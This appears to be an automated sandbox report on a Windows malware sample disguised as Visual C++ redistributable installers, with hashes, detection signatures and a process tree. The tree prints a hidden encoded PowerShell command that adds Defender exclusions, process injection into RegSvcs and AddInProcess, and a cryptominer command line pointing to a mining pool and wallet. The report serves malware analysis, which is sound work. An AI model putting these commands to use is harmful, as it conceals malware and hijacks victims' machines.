Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-01-2025 21:07
Static task
static1
Behavioral task
behavioral1
Sample
72d7f2c25d9368c8e60be5aea600336106be8ed587176c2d9be66ae059a700d0.exe
Resource
win7-20240903-en
General
-
Target
72d7f2c25d9368c8e60be5aea600336106be8ed587176c2d9be66ae059a700d0.exe
-
Size
3.2MB
-
MD5
ef95037bc2bc262ebf19f6d0e32989aa
-
SHA1
3758acfc8f32db765d3bed155293c10e9f2d563c
-
SHA256
72d7f2c25d9368c8e60be5aea600336106be8ed587176c2d9be66ae059a700d0
-
SHA512
da21c049dc5f7397c32e62b03e49c72933fe9ad16c90fb85d5dc12ad5b3e5ca08068096fb8d1befdbbfb92137cea1a852f6cdecac7ab77906d6a62b28e26631b
-
SSDEEP
49152:ZsvZqioD6MlKCXijBNt9BlXMJq7FSFG+85whW7QMt9XoayEIu3tyws:ZshoDVKCXidDDpRSFG+fhWM6CoIudBs
Malware Config
Signatures
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF VC_redist.x86.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2164 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation 72d7f2c25d9368c8e60be5aea600336106be8ed587176c2d9be66ae059a700d0.exe -
Executes dropped EXE 3 IoCs
pid Process 3968 VC_redist.x64.exe 2992 VC_redist.x86.exe 2036 TypeId.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2036 set thread context of 1728 2036 TypeId.exe 97 PID 1728 set thread context of 816 1728 RegSvcs.exe 98 -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral2/files/0x0008000000023cd2-2645.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 72d7f2c25d9368c8e60be5aea600336106be8ed587176c2d9be66ae059a700d0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VC_redist.x86.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2164 powershell.exe 2164 powershell.exe 2992 VC_redist.x86.exe 2992 VC_redist.x86.exe 2992 VC_redist.x86.exe 2992 VC_redist.x86.exe 2992 VC_redist.x86.exe 2992 VC_redist.x86.exe 2992 VC_redist.x86.exe 2992 VC_redist.x86.exe 2036 TypeId.exe 2036 TypeId.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe 1728 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 3968 VC_redist.x64.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 2036 TypeId.exe Token: SeDebugPrivilege 1728 RegSvcs.exe Token: SeLockMemoryPrivilege 816 AddInProcess.exe Token: SeLockMemoryPrivilege 816 AddInProcess.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 816 AddInProcess.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 4476 wrote to memory of 3968 4476 72d7f2c25d9368c8e60be5aea600336106be8ed587176c2d9be66ae059a700d0.exe 82 PID 4476 wrote to memory of 3968 4476 72d7f2c25d9368c8e60be5aea600336106be8ed587176c2d9be66ae059a700d0.exe 82 PID 4476 wrote to memory of 2992 4476 72d7f2c25d9368c8e60be5aea600336106be8ed587176c2d9be66ae059a700d0.exe 90 PID 4476 wrote to memory of 2992 4476 72d7f2c25d9368c8e60be5aea600336106be8ed587176c2d9be66ae059a700d0.exe 90 PID 4476 wrote to memory of 2992 4476 72d7f2c25d9368c8e60be5aea600336106be8ed587176c2d9be66ae059a700d0.exe 90 PID 2036 wrote to memory of 1728 2036 TypeId.exe 97 PID 2036 wrote to memory of 1728 2036 TypeId.exe 97 PID 2036 wrote to memory of 1728 2036 TypeId.exe 97 PID 2036 wrote to memory of 1728 2036 TypeId.exe 97 PID 2036 wrote to memory of 1728 2036 TypeId.exe 97 PID 2036 wrote to memory of 1728 2036 TypeId.exe 97 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 PID 1728 wrote to memory of 816 1728 RegSvcs.exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\72d7f2c25d9368c8e60be5aea600336106be8ed587176c2d9be66ae059a700d0.exe"C:\Users\Admin\AppData\Local\Temp\72d7f2c25d9368c8e60be5aea600336106be8ed587176c2d9be66ae059a700d0.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3968
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"2⤵
- Enumerates VirtualBox registry keys
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAEYAaQB4AGUAZABTAGkAegBlAFwAVAB5AHAAZQBJAGQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAHMARgBpAHgAZQBkAFMAaQB6AGUAXABUAHkAcABlAEkAZAAuAGUAeABlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
C:\Users\Admin\AppData\Roaming\IsFixedSize\TypeId.exeC:\Users\Admin\AppData\Roaming\IsFixedSize\TypeId.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:rSD9orXxAHU34odXRhL8dgpnB6dyJNzqU5.RIG_CPU -p x --cpu-max-threads-hint=503⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:816
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
628KB
MD5ad0b3e8f6319b7fd1ead16ffe7f5be6b
SHA102ff5714aa418cf9a17eb9c17c0f02753746eac4
SHA256f585688233737a15a893b0c8fb66f75bea8478e0fed11a9c72a28dd7d048ccdc
SHA512d62c2f4a40aeed7c433b842768065b0f39496ab58e205ac008fb583e9b0018f851258ec675c8bca8cb96ced95bd568820a4bb2e9ff06c70ba7fde7b96db8f72a
-
Filesize
7.7MB
MD5f6b28de198800179a0cedaf80a94d2bf
SHA1d4ebd56bf9f0d09763b0dc7d5744833ba0a07af3
SHA256a93027840829eabd77e96b893e7afdabf832702fb9e95b056a45809e448fec2f
SHA5121c8cb16058d19a4fdd323e5736a55e1aa8d41b3cd6af0012c764b67dcb9af2a2527ec9b8a08cefc2749cba93e6ffd7bc967497b431e02dc3ba822e42e2fd929a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82